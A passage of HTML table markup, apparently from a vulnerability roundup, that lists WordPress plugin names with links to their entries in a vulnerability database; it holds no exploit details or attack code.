			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager-advanced" target="_blank" rel="noopener">file-manager-advanced</a>
		</td>
</tr>
<tr>
<td>Advanced Product Fields (Product Addons) for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-product-fields-for-woocommerce" target="_blank" rel="noopener">advanced-product-fields-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Affiliates Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/affiliates-manager" target="_blank" rel="noopener">affiliates-manager</a>
		</td>
</tr>
<tr>
<td>AI Agent by SiteGround</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sg-ai-studio" target="_blank" rel="noopener">sg-ai-studio</a>
		</td>
</tr>
<tr>
<td>All-in-One WP Migration and Backup</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/all-in-one-wp-migration" target="_blank" rel="noopener">all-in-one-wp-migration</a>
		</td>
</tr>
<tr>
<td>Appointment Hour Booking – Booking Calendar</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/appointment-hour-booking" target="_blank" rel="noopener">appointment-hour-booking</a>
		</td>
</tr>
<tr>
<td>Atarim – AI Agency for WordPress: Edit Pages, Fix Code, Update Plugins, SEO &amp; Client Feedback</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/atarim-visual-collaboration" target="_blank" rel="noopener">atarim-visual-collaboration</a>
		</td>
</tr>
<tr>
<td>Automation Web Platform – Notifications and OTP for WooCommerce, Advanced Country Code</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/automation-web-platform" target="_blank" rel="noopener">automation-web-platform</a>
		</td>
</tr>
<tr>
<td>AutomatorWP – Automator plugin for no-code automations, webhooks &amp; custom integrations in WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/automatorwp" target="_blank" rel="noopener">automatorwp</a>
		</td>
</tr>
<tr>
<td>Autopay</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/platnosci-online-blue-media" target="_blank" rel="noopener">platnosci-online-blue-media</a>
		</td>
</tr>
<tr>
<td>B2Bking</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/b2bking" target="_blank" rel="noopener">b2bking</a>
		</td>
</tr>
<tr>
<td>B2BKing — Ultimate WooCommerce B2B and Wholesale Plugin — Wholesale Prices, Bulk Order Form &amp; More</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/b2bking-wholesale-for-woocommerce" target="_blank" rel="noopener">b2bking-wholesale-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>BBQ Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bbq-pro" target="_blank" rel="noopener">bbq-pro</a>
		</td>
</tr>
<tr>
<td>Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bp-better-messages" target="_blank" rel="noopener">bp-better-messages</a>
		</td>
</tr>
<tr>
<td>Booking calendar, Appointment Booking System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-calendar" target="_blank" rel="noopener">booking-calendar</a>
		</td>
</tr>
<tr>
<td>BookingPress Appointment Booking Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookingpress-appointment-booking-pro" target="_blank" rel="noopener">bookingpress-appointment-booking-pro</a>
		</td>
</tr>
<tr>
<td>Broken Link Checker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/broken-link-checker" target="_blank" rel="noopener">broken-link-checker</a>
		</td>
</tr>
<tr>
<td>CatFolders Document Gallery &amp; PDF Library</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/catfolders-document-gallery" target="_blank" rel="noopener">catfolders-document-gallery</a>
		</td>
</tr>
<tr>
<td>Charitable – Donation &amp; Fundraising Platform (Donation Forms, Recurring Donations &amp; Fundraising Campaigns)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/charitable" target="_blank" rel="noopener">charitable</a>
		</td>
</tr>
<tr>
<td>Community by PeepSo – Download from PeepSo.com</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/peepso-core" target="_blank" rel="noopener">peepso-core</a>
		</td>
</tr>
<tr>
<td>Contact Form by Supsystic</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-by-supsystic" target="_blank" rel="noopener">contact-form-by-supsystic</a>
		</td>
</tr>
<tr>
<td>Contest Gallery – Upload &amp; Vote Photos, Media, Sell with PayPal &amp; Stripe</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery" target="_blank" rel="noopener">contest-gallery</a>
		</td>
</tr>
<tr>
<td>Depicter — Popup &amp; Slider Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/depicter" target="_blank" rel="noopener">depicter</a>
		</td>
</tr>
<tr>
<td>Digits: WordPress Mobile Number Signup and Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/digits" target="_blank" rel="noopener">digits</a>
		</td>
</tr>
<tr>
<td>Dinatur</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dinatur" target="_blank" rel="noopener">dinatur</a>
		</td>
</tr>
<tr>
<td>Directory Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/directory-pro" target="_blank" rel="noopener">directory-pro</a>
		</td>
</tr>
<tr>
<td>Draft List</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-draft-list" target="_blank" rel="noopener">simple-draft-list</a>
		</td>
</tr>
<tr>
<td>Duitku Payment Gateway</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/duitku-social-payment-gateway" target="_blank" rel="noopener">duitku-social-payment-gateway</a>
		</td>
</tr>
<tr>
<td>DynamicKit for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dynamickit-elementor" target="_blank" rel="noopener">dynamickit-elementor</a>
		</td>
</tr>
<tr>
<td>E-cab Taxi Booking Manager for Woocommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ecab-taxi-booking-manager" target="_blank" rel="noopener">ecab-taxi-booking-manager</a>
		</td>
</tr>
<tr>
<td>Easy Appointments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">easy-appointments</a>
		</td>
</tr>
<tr>
<td>Easy Elementor Addons – Addons Pack for Elementor Page Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-elementor-addons" target="_blank" rel="noopener">easy-elementor-addons</a>
		</td>
</tr>
<tr>
<td>Easy Media Replace</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-media-replace" target="_blank" rel="noopener">easy-media-replace</a>
		</td>
</tr>
<tr>
<td>EasyTest – Simplify A/B Testing</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/convertpro-2" target="_blank" rel="noopener">convertpro</a>
		</td>
</tr>
<tr>
<td>ECS – Ele Custom Skin for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ele-custom-skin" target="_blank" rel="noopener">ele-custom-skin</a>
		</td>
</tr>
<tr>
<td>Elementor Website Builder Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/elementor-pro" target="_blank" rel="noopener">elementor-pro</a>
		</td>
</tr>
<tr>
<td>EPROLO-Dropshipping</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eprolo-dropshipping" target="_blank" rel="noopener">eprolo-dropshipping</a>
		</td>
</tr>
<tr>
<td>eShipper Commerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eshipper-commerce" target="_blank" rel="noopener">eshipper-commerce</a>
		</td>
</tr>
<tr>
<td>Estatik Real Estate Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/estatik" target="_blank" rel="noopener">estatik</a>
		</td>
</tr>
<tr>
<td>Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">wp-event-solution</a>
		</td>
</tr>
<tr>
<td>Events Made Easy</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/events-made-easy" target="_blank" rel="noopener">events-made-easy</a>
		</td>
</tr>
<tr>
<td>EWWW Image Optimizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ewww-image-optimizer" target="_blank" rel="noopener">ewww-image-optimizer</a>
		</td>
</tr>
<tr>
<td>Extra Product Options Builder for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/additional-product-fields-for-woocommerce" target="_blank" rel="noopener">additional-product-fields-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Featured Video Plus</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/featured-video-plus" target="_blank" rel="noopener">featured-video-plus</a>
		</td>
</tr>
<tr>
<td>Flatastic &#8211; Versatile MultiVendor WordPress Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-66672" target="_blank" rel="noopener">flatastic</a>
		</td>
</tr>
<tr>
<td>Flexible Subscriptions</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/flexible-subscriptions" target="_blank" rel="noopener">flexible-subscriptions</a>
		</td>
</tr>
<tr>
<td>Fluent Forms Pro Add On Pack</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentformpro" target="_blank" rel="noopener">fluentformpro</a>
		</td>
</tr>
<tr>
<td>Flutterwave WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rave-woocommerce-payment-gateway" target="_blank" rel="noopener">rave-woocommerce-payment-gateway</a>
		</td>
</tr>
<tr>
<td>Form Maker by 10Web – Mobile-Friendly Drag &amp; Drop Contact Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/form-maker" target="_blank" rel="noopener">form-maker</a>
		</td>
</tr>
<tr>
<td>Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">forminator</a>
		</td>
</tr>
<tr>
<td>Frontend Admin by DynamiApps</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/acf-frontend-form-element" target="_blank" rel="noopener">acf-frontend-form-element</a>
		</td>
</tr>
<tr>
<td>FundEngine – Donation and Crowdfunding Platform</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-fundraising-donation" target="_blank" rel="noopener">wp-fundraising-donation</a>
		</td>
</tr>
<tr>
<td>GEO Plugin by Squirrly SEO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/squirrly-seo" target="_blank" rel="noopener">squirrly-seo</a>
		</td>
</tr>
<tr>
<td>GeoDirectory – WP Business Directory Plugin and Classified Listings Directory</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geodirectory" target="_blank" rel="noopener">geodirectory</a>
		</td>
</tr>
<tr>
<td>Global Gallery &#8211; WordPress Responsive Gallery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/global-gallery" target="_blank" rel="noopener">global-gallery</a>
		</td>
</tr>
<tr>
<td>Golo Framework</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/golo-framework" target="_blank" rel="noopener">golo-framework</a>
		</td>
</tr>
<tr>
<td>GP Premium</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gp-premium" target="_blank" rel="noopener">gp-premium</a>
		</td>
</tr>
<tr>
<td>Greenshift – animation and page builder blocks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/greenshift-animation-and-page-builder-blocks" target="_blank" rel="noopener">greenshift-animation-and-page-builder-blocks</a>
		</td>
</tr>
<tr>
<td>GutenKit – Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenkit-blocks-addon" target="_blank" rel="noopener">gutenkit-blocks-addon</a>
		</td>
</tr>
<tr>
<td>HashBar – Announcement, Notification Bar &amp; Popup Campaign</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hashbar-wp-notification-bar" target="_blank" rel="noopener">hashbar-wp-notification-bar</a>
		</td>
</tr>
<tr>
<td>Image Photo Gallery Final Tiles Grid</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/final-tiles-grid-gallery-lite" target="_blank" rel="noopener">final-tiles-grid-gallery-lite</a>
		</td>
</tr>
<tr>
<td>InfiniteWP Client</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/iwp-client" target="_blank" rel="noopener">iwp-client</a>
		</td>
</tr>
<tr>
<td>Issues and Series for Newspapers, Magazines, Publishers, Writers</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/organize-series" target="_blank" rel="noopener">organize-series</a>
		</td>
</tr>
<tr>
<td>JetAppointment</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-appointments-booking" target="_blank" rel="noopener">jet-appointments-booking</a>
		</td>
</tr>
<tr>
<td>JetEngine</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-engine" target="_blank" rel="noopener">jet-engine</a>
		</td>
</tr>
<tr>
<td>JSON Options</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/json-options" target="_blank" rel="noopener">json-options</a>
		</td>
</tr>
<tr>
<td>Kalles Addons</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kalles-addons" target="_blank" rel="noopener">kalles-addons</a>
		</td>
</tr>
<tr>
<td>Kirki – Freeform Page Builder, Website Builder &amp; Customizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">kirki</a>
		</td>
</tr>
<tr>
<td>KiviCare – Clinic &amp; Patient Management System (EHR)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kivicare-clinic-management-system" target="_blank" rel="noopener">kivicare-clinic-management-system</a>
		</td>
</tr>
<tr>
<td>kk Star Ratings – Rate Post &amp; Collect User Feedbacks</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kk-star-ratings" target="_blank" rel="noopener">kk-star-ratings</a>
		</td>
</tr>
<tr>
<td>Leyka</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/leyka" target="_blank" rel="noopener">leyka</a>
		</td>
</tr>
<tr>
<td>License Manager for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/license-manager-for-woocommerce" target="_blank" rel="noopener">license-manager-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Locatoraid Store Locator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/locatoraid" target="_blank" rel="noopener">locatoraid</a>
		</td>
</tr>
<tr>
<td>Login With Ajax – Fast Logins, 2FA, Redirects</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/login-with-ajax" target="_blank" rel="noopener">login-with-ajax</a>
		</td>
</tr>
<tr>
<td>Mailgun for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailgun" target="_blank" rel="noopener">mailgun</a>
		</td>
</tr>
<tr>
<td>Manual Image Crop</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/manual-image-crop" target="_blank" rel="noopener">manual-image-crop</a>
		</td>
</tr>
<tr>
<td>Masteriyo LMS – LMS Course Builder, Quizzes &amp; Certificates</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system" target="_blank" rel="noopener">learning-management-system</a>
		</td>
</tr>
<tr>
<td>MasterStudy LMS WordPress Plugin – for Online Courses and Education</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">masterstudy-lms-learning-management-system</a>
		</td>
</tr>
<tr>
<td>MC4WP: Mailchimp for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailchimp-for-wp" target="_blank" rel="noopener">mailchimp-for-wp</a>
		</td>
</tr>
<tr>
<td>Media Library Assistant</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-library-assistant" target="_blank" rel="noopener">media-library-assistant</a>
		</td>
</tr>
<tr>
<td>Membership For WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/membership-for-woocommerce" target="_blank" rel="noopener">membership-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn) Pro Addon</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-login-openid-2" target="_blank" rel="noopener">miniorange-login-openid</a>
		</td>
</tr>
<tr>
<td>Modal Survey &#8211; WordPress Poll, Survey &amp; Quiz Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/modal-survey" target="_blank" rel="noopener">modal-survey</a>
		</td>
</tr>
<tr>
<td>MultiVendorX – WooCommerce Multivendor Marketplace AI Powered Solutions</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dc-woocommerce-multi-vendor" target="_blank" rel="noopener">dc-woocommerce-multi-vendor</a>
		</td>
</tr>
<tr>
<td>MWB HubSpot for WooCommerce – CRM, Abandoned Cart, Email Marketing, Marketing Automation &amp; Analytics</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/makewebbetter-hubspot-for-woocommerce" target="_blank" rel="noopener">makewebbetter-hubspot-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>New User Approve</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/new-user-approve" target="_blank" rel="noopener">new-user-approve</a>
		</td>
</tr>
<tr>
<td>Newsletter – Send awesome emails from WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletter" target="_blank" rel="noopener">newsletter</a>
		</td>
</tr>
<tr>
<td>NGG Smart Image Search</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ngg-smart-image-search" target="_blank" rel="noopener">ngg-smart-image-search</a>
		</td>
</tr>
<tr>
<td>Nikstore Core</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nikstore-core" target="_blank" rel="noopener">nikstore-core</a>
		</td>
</tr>
<tr>
<td>Notification Master – Real-Time WordPress Notifications With Email, SMS, Webhooks &amp; More</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/notification-master" target="_blank" rel="noopener">notification-master</a>
		</td>
</tr>
<tr>
<td>NotificationX Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-68564" target="_blank" rel="noopener">notificationx-pro</a>
		</td>
</tr>
<tr>
<td>Online Contact Widget-多合一在线客服插件</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/online-contact-widget" target="_blank" rel="noopener">online-contact-widget</a>
		</td>
</tr>
<tr>
<td>OptionTree</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/option-tree" target="_blank" rel="noopener">option-tree</a>
		</td>
</tr>
<tr>
<td>Outranking Plugin Options</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/outranking" target="_blank" rel="noopener">outranking</a>
		</td>
</tr>
<tr>
<td>Pay with Contact Form 7</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pay-with-contact-form-7" target="_blank" rel="noopener">pay-with-contact-form-7</a>
		</td>
</tr>
<tr>
<td>Paymob for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/paymob-for-woocommerce" target="_blank" rel="noopener">paymob-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>PDF Smart Viewer for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pdf-smart-viewer-for-elementor" target="_blank" rel="noopener">pdf-smart-viewer-for-elementor</a>
		</td>
</tr>
<tr>
<td>Persistent Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-persistent-login" target="_blank" rel="noopener">wp-persistent-login</a>
		</td>
</tr>
<tr>
<td>Piraeus Bank WooCommerce Payment Gateway</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-payment-gateway-for-piraeus-bank" target="_blank" rel="noopener">woo-payment-gateway-for-piraeus-bank</a>
		</td>
</tr>
<tr>
<td>Podlove Podcast Publisher</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/podlove-podcasting-plugin-for-wordpress" target="_blank" rel="noopener">podlove-podcasting-plugin-for-wordpress</a>
		</td>
</tr>
<tr>
<td>Post Duplicator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/post-duplicator" target="_blank" rel="noopener">post-duplicator</a>
		</td>
</tr>
<tr>
<td>PPWP – Password Protect Pages</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/password-protect-page" target="_blank" rel="noopener">password-protect-page</a>
		</td>
</tr>
<tr>
<td>Premium Packages – Sell Digital Products Securely</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">wpdm-premium-packages</a>
		</td>
</tr>
<tr>
<td>Product Shortlist</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/product-shortlist" target="_blank" rel="noopener">product-shortlist</a>
		</td>
</tr>
<tr>
<td>Query Wrangler</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/query-wrangler" target="_blank" rel="noopener">query-wrangler</a>
		</td>
</tr>
<tr>
<td>Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next" target="_blank" rel="noopener">quiz-master-next</a>
		</td>
</tr>
<tr>
<td>Readabler</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/readabler" target="_blank" rel="noopener">readabler</a>
		</td>
</tr>
<tr>
<td>Recipe Card Blocks Lite</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/recipe-card-blocks-by-wpzoom" target="_blank" rel="noopener">recipe-card-blocks-by-wpzoom</a>
		</td>
</tr>
<tr>
<td>RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-registration-form-builder-with-submission-manager" target="_blank" rel="noopener">custom-registration-form-builder-with-submission-manager</a>
		</td>
</tr>
<tr>
<td>Restaurant Menu and Food Ordering</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mp-restaurant-menu" target="_blank" rel="noopener">mp-restaurant-menu</a>
		</td>
</tr>
<tr>
<td>Royal Addons for Elementor – Addons and Templates Kit for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/royal-elementor-addons" target="_blank" rel="noopener">royal-elementor-addons</a>
		</td>
</tr>
<tr>
<td>rtMedia for WordPress, BuddyPress and bbPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/buddypress-media" target="_blank" rel="noopener">buddypress-media</a>
		</td>
</tr>
<tr>
<td>SAML Single Sign On – SSO Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-saml-20-single-sign-on-2" target="_blank" rel="noopener">miniorange-saml-20-single-sign-on</a>
		</td>
</tr>
<tr>
<td>Security Hardener</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/security-hardener" target="_blank" rel="noopener">security-hardener</a>
		</td>
</tr>
<tr>
<td>Security Plugin, Firewall &amp; Malware Scanner with Auto Removal</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/security-malware-firewall" target="_blank" rel="noopener">security-malware-firewall</a>
		</td>
</tr>
<tr>
<td>ShopMonitor.io – Automated Checkout &amp; Form Monitoring</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shopmonitorio" target="_blank" rel="noopener">shopmonitorio</a>
		</td>
</tr>
<tr>
<td>Simple File List</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-file-list" target="_blank" rel="noopener">simple-file-list</a>
		</td>
</tr>
<tr>
<td>Simple JWT Login – Allows you to use JWT on REST endpoints.</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-jwt-login" target="_blank" rel="noopener">simple-jwt-login</a>
		</td>
</tr>
<tr>
<td>SimplyRETS Real Estate IDX</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simply-rets" target="_blank" rel="noopener">simply-rets</a>
		</td>
</tr>
<tr>
<td>Slider by 10Web – Responsive Image Slider</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/slider-wd" target="_blank" rel="noopener">slider-wd</a>
		</td>
</tr>
<tr>
<td>Smart Popup by Supsystic</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/popup-by-supsystic" target="_blank" rel="noopener">popup-by-supsystic</a>
		</td>
</tr>
<tr>
<td>SmartCrawl SEO checker, analyzer &amp; optimizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smartcrawl-seo" target="_blank" rel="noopener">smartcrawl-seo</a>
		</td>
</tr>
<tr>
<td>SmartSMTP</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-smtp" target="_blank" rel="noopener">smart-smtp</a>
		</td>
</tr>
<tr>
<td>Social Media Share Buttons &amp; Social Sharing Icons</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-social-media-icons" target="_blank" rel="noopener">ultimate-social-media-icons</a>
		</td>
</tr>
<tr>
<td>Speed Optimizer – The All-In-One Performance-Boosting Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sg-cachepress" target="_blank" rel="noopener">sg-cachepress</a>
		</td>
</tr>
<tr>
<td>Sticky Chat Widget – Floating Chat Icons, Contact Form, Call, Click to Chat, Email &amp; Message Buttons</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sticky-chat-widget" target="_blank" rel="noopener">sticky-chat-widget</a>
		</td>
</tr>
<tr>
<td>Stitch Express</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stitch-express" target="_blank" rel="noopener">stitch-express</a>
		</td>
</tr>
<tr>
<td>Super Store Finder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/superstorefinder-wp" target="_blank" rel="noopener">superstorefinder-wp</a>
		</td>
